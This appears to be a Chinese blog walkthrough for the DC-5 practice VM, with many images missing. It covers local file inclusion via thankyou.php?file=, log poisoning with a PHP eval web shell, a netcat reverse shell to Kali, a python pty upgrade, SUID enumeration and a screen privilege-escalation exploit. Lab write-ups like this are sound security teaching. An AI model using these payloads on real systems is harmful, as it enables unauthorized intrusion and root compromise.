大道之行,天下为公。这篇文章主要讲述靶机DC-5相关的知识,希望能为你提供帮助。
DC-5靶机下载地址:https://www.five86.com/dc-5.html
扫描网段探测靶机ip
文章图片
?
访问下web站点 发现在contact提交后,每次提交完成后显示的年份都会发生变化
文章图片
文章图片
每次都会带上的查询的参数,可以尝试下能不能访问别的文件
文章图片
?
原来显示年份的地方变成当前查询的文件的内容了
文章图片
?
又看了下111端口,也没什么好利用的
文章图片
还是回到站点上,通过查看nginx配置文件找到访问日志和错误日志的路径
?file=/etc/nginx/nginx.conf
文章图片
访问access.log,然后在url出插入一句话,不能用post参数,然后在error日志中可以看到这条操作
?<
?php eval($_REQUEST[\'admin\']);
?>
文章图片
文章图片
然后使用蚁剑连接,连access.log和error.log都是可以的 将上面的url直接复制到蚁剑即可
连access.log建议把安全软件暂时关一下
http://your-ip/thankyou.php?file=/var/log/error.log
文章图片
文章图片
打开虚拟终端,然后nc弹到kali上
文章图片
获取交互模式
python -c \'import pty;
pty.spawn("/bin/sh")\'参照DC1的提权方法,用find命令查看有sudo权限的指令
find / -perm -u=s -type f 2>
/dev/null
文章图片
【靶机DC-5】试了下前面几个命令不太行 直接干screen,先搜索下漏洞
文章图片
将脚本文件上传到靶机发现不能直接用,还需要处理下 脚本文件里会有一些说明
文章图片
将这些文件放到tmp目录下,然后指定gcc命令编译,上图箭头所指的命令
文章图片
文章图片
完成后,这俩绿色儿的上传到靶机tmp目录,方法随意
文章图片
文章图片
?
然后再执行下列命令,#号别带上
文章图片
提权成功
文章图片
在root目录下找到flag
文章图片
推荐阅读
- vue开发(前端项目模板)
- MySQL 不完全入门指南
- 静态路由-路由负载均衡
- “不服跑个分(” 是噱头还是实力?| 龙蜥技术)
- 红帽Linux入门指南第一期(红帽 RHEL 8.0 操作系统安装步骤详解)
- 网络安全学习笔记工具篇——GSIL GITHUB敏感信息泄露检测工具
- 如何实现word在线预览
- 如何重启数据库服务(包含单实例/流复制/集群)
- 接口测试进阶接口脚本使用--apipost(预/后执行脚本)